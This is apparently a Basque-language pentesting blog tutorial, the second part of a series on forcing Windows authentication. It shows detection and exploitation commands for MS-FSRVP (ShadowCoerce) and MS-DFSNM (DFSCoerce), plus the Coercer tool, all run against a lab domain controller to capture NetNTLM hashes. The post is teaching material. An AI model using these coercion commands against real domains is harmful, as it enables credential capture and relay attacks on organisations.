Coerce | Parte II

Bortxaketa | II. zatia

Celia Catalán

 


Kaixo berriro guztioi! Agindu bezala, Coerce sagarekin jarraitzen dugu eta bigarren zati honetan beste RPC zaurgarri batzuk komentatzen jarraitzen dugu:

MS-FSRPP

MS-FSRVP Urruneko Prozedura Deia da VSS urruneko fitxategi-zerbitzariaren protokoloarekin lotutakoa. Urrutiko ordenagailu batean fitxategi-partekatzeen kopiak sortzeko eta babeskopia-aplikazioek aplikazioekin bat datozen babeskopiak egiteko eta datuak SMB2-ko partekatzeetan leheneratzeko erabiltzen da.

Kontuan izan behar da ahultasun hori ustiatzeko, zerbitzariak "File Server VSS Agent Service" funtzioa gaituta izan behar duela. 



Kontuan izan behar da Microsoft-ek bi segurtasun adabaki kaleratu zituela zuzentzeko 2022ko ekainaren 14an.

Egiaztapena

MS-RPRN-ren kasuan bezala, egiaztatzeko impacket -en rpcdump erabiltzen dugu MS-FSRVP RPC gaituta badago:

python3 rpcdump.py @dc.corp.lab | grep 'MS-FSRVP'


Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.

Explotazioa

Biktimarengan "MS-FSRPP" izeneko RPC gaituta dagoela egiaztatu ondoren, domeinu-erabiltzailea beste bide batzuen bidez arriskuan jartzeaz gain, -2022-30154 CVE identifikatzailea esleituta duen ShadowCoerce izeneko PoC baten bidez ustiatuko da. 

Era berean, autentifikazioa behar bezala behartuta dagoela egiaztatzeko, “dc.corp.lab” domeinuan pribilegio mugatuak dituen “bob” erabiltzailea erabiliko dugu.

python shadowcoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab


NetNTLM hash-aren harrapaketa Erantzun tresnan ikus dezakezu. 


MS-DFSNM


MS-DFSNM Distributed File System (DFS): Namespace Management Protocol-arekin erlazionatutako Urruneko Prozedura Deia da. RPC interfaze bat eskaintzen du DFS konfigurazioak kudeatzeko. 


Egiaztapena

MS-EFSR-ren kasuan bezala, crackmapexec tresna erabiliko dugu, "dfscoerce" moduluaren exekuzioaren bidez eta "dc.corp.lab" domeinuan pribilegio mugatuak dituen "bob" erabiltzailea erabiliz, ala ez egiaztatzeko. zerbitzaria zaurgarria da edo ez, baina oraingoan aurrez arriskuan jarritako domeinuko erabiltzaile batekin:

crackmapexec smb dc.corp.lab -d "corp.lab" -u "bob" -p "" -M dfscoerce


Kontuan izan behar da metodo gehiago daudela egiaztatzeko RPC hori gaituta dagoen beste tresna eta teknika batzuk erabiliz.

Explotazioa

Domeinu-kontrolatzailea zaurgarria dela egiaztatu ondoren, 2022ko ekainean argitaratu zen DFSCoerce izeneko PoC baten bidez ustiatu egingo da.

Era berean, autentifikazioa behar bezala behartuta dagoela egiaztatzeko, “dc.corp.lab” domeinuan pribilegio mugatuak dituen “bob” erabiltzailea erabiliko dugu.

python3 dfscoerce.py -d "CORP" -u "bob" -p "" attack_machine dc.corp.lab


Se NetNTLM hash-aren harrapaketa Erantzun tresnan ikus dezakezu.



Guztiak batentzat eta batentzat


Coercer Python-en idatzitako tresna bat da, "Coerce Authentication" bat egiteko hainbat metodo probatzen dituena, goian deskribatutako guztiak barne hartzeaz gain.

Hiru exekuzio modu ditu, eskaneatu, behartu eta fuzz. Eskaneatu moduan exekutatzeko adibide bat honako hau izango litzateke:

coercer scan -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"


Koertza moduan exekutatzeko adibide bat honako hau izango litzateke:

coercer coerce -l attack_machine -t dc.corp.lab -u "bob" -p "" -d "CORP.LAB"


Cheat Orria 




Itzuli blogera

Utzi iruzkin bat

Kontuan izan iruzkinak argitaratu aurretik onartu behar direla.